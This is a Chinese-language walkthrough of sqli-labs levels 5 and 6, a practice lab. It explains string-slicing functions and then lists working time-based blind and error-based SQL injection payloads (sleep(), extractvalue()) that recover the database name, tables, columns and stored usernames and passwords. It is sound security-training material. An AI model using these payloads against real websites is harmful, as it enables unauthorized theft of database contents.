进入第五关之后稀里糊涂随便注了一通发现没有篮子用。可能是:布尔型盲注、报错型注入、时间延迟型盲注了。
到这里时我们需要了解一些sql语句、函数。可以参考https://blog.csdn.net/qq_41420747/article/details/81773481
1、构造逻辑判断
(1)sql注入截取字符串常用涵数
在sql注入中,往往会用到截取字符串的问题,例如不回显的情况下进行的注入,也称为盲注,这种情况下往往需要一个一个字符的去猜解,过程中需要用到截取字符串。本文中主要列举三个函数和该函数注入过程中的一些用例。
函数:mid() substr() left()
mid()函数为截取字符串一部分。mid(column_name,start,length)
column_name 必需,要提取字符的字段
start 必需,规定开始位置(起始为1)
length 可选,要返回的字符数,如果省略则返回剩余文本
eg:str="123456" mid(str,2,1) 结果为2
substr()
Substr()和substring()函数实现的功能是一样的,均为截取字符串。
string substring(string, start, length)
string substr(string, start, length)
参数描述同mid()函数,第一个参数为要处理的字符串,start为开始位置,length为截取的长度
left()函数
Left()得到字符串左部指定个数的字符
Left ( string, n ) string为要截取的字符串,n为长度。
•基于时间的 SQL 盲注--延时注入
•基于报错的 SQL 盲注-构造 payload 让信息通过错误提示回显出来
第一种,时间延迟型注入手工注入
时间延迟型手工注入,正确会延迟,错误没有延迟。可以通过浏览器的刷新提示观察延迟情况,但是id正确的时候的回显有利于观察。
我们构造sql语句,带上时间延迟的函数,如果有明显的延迟说明有注入点。
?id=1’ and if(length(database())=n,sleep(5),1)--+
经过几次尝试,发现数据库长度为8时有明显延迟5秒。
?id=1' and if(length(database())=8,sleep(5),1)--+
猜库名
数据库第一个字符为s,加下来以此增加left(database(),字符长度)中的字符长度,等号右边以此爆破下一个字符,正确匹配时会延迟。最终爆破得到left(database(),8)='security'
?id=1' and if(left(database(),1)='s',sleep(5),1)--+
猜表名
?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users',sleep(5),5)--+
经过几次尝试找到了表名。
猜列名
?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password',sleep(5),1)--+
首先尝试定向爆破,以提高手工注入速度,修改limit x,1 中的x查询password是否存在表中,lucky的是limit 3,1的时候查到了password列,同样的方法查询username ,又一个lucky
猜值
?id=1’ and if(left((select password from users order by id limit 0,1),4)=‘dumb’ ,sleep(5),1)–+
?id=1’ and if(left((select username from users order by id limit 0,1),4)=‘dumb’ ,sleep(5),1)–+
按照id排序,这样便于对应。注意limit 从0开始.通过坚持不懈的尝试终于爆破到第一个用户的名字dumb,密码dumb,需要注意的是,mysql对大小写不敏感,所以你不知道是Dumb 还是dumb
到这里建议使用sqlmap https://www.cnblogs.com/tac2664/p/13772176.html 第一关的第二种方法,相同 用工具既省劲又方便
第二种,报错注入
爆库
?id=1' and extractvalue(1,concat(0x23,database(),0x23))--+
爆表名
?id=1' and extractvalue(1,concat(0x23,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x23))--+
爆列名
?id=1' and extractvalue(1,concat(0x23,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),0x23))--+
爆数据
?id=1' and extractvalue(1,concat(0x23,(select password from users order by id limit 0,1),0x23))--+
?id=1' and extractvalue(1,concat(0x23,(select username from users order by id limit 2,1),0x23))--+
用limit 可以看所有的数据了。
第六关
源码中:
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
将第五关的单引号改为双引号即可。